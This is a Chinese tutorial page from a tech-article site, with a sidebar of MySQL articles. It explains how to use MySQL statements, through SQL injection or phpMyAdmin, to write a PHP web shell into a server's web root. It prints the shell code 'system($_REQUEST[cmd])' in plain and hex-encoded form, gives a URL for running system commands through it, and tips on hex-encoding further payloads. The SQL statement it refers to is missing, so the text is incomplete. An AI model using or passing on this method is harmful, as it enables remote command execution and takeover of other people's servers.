当前位置: 首页 > 图文教程 > 数据库 > MYSQL > 运用Mysql语句生成后门木马的具体方法

MYSQL
ext3下删除mysql数据库的数据恢复案例
mysql性能的检查和调优方法
数据库查询的分页优化技巧
如何才能有效对抗MySQL数据库的解密高手
mysql中从字段中URL提取域名信息
教你四种方法用来查看mysql版本
MySQL数据库数据备份和恢复详解
ubuntu下简单配置mysql数据库
MySQL数据库的root口令恢复方法总结
再谈 MySQL 数据库备份恢复和乱码问题
修改 Navicat 默认备份路径
MySQL数据库中修改密码及访问限制设置详解
小白讲座:在win下mysql备份恢复命令概括
菜鸟大讲堂:如何查看mysql版本的四种方法
扫盲大讲堂:mysql出错的代码解析及解答
MySQL安全大讲堂:MySQL数据库安全配置
怎样在vc、delphi中使用mysql(mysql odbc驱动的使用)
MySQL数据导入与导出之二
如何实现MySQL中的用户管理?
win 2000 安装 mysql-shareware-3.22.32-win

MYSQL 中的 运用Mysql语句生成后门木马的具体方法


出处:互联网   整理: 软晨网(RuanChen.com)   发布: 2009-10-17   浏览: 99 ::
收藏到网摘: n/a

通过Mysql 的语句生成后门木马的方法:

通过Mysql 的注入或者在 phpmyadmin 里运行以上语句,则会C:/inetpub/wwwroot/下生成 cmd.php 文件,内容为原来的 vbb_strikes 内容,后面紧跟着:

2 3 <?php system($_REQUEST[cmd]);?>

再通过 http://www.xxx.com/cmd.php?cmd=dir c:\ 就可以执行系统DOS命令!

问:那串0x3C3F7068702073797374656D28245F524551554553545B636D645D293B3F3E是什么?

答:就是下面代码中的十六进制编码,

<?php system($_REQUEST[cmd]);?>

如果不用这种方法,有不同的SQL版本会出现其它的编码:如%xx之类的,哪这个后门就不能执行了!如果你有其它语名要弄,可以到UltraEdit里输入,再按[Ctrl+H]键,将里面的十六进制连在一起就可以了!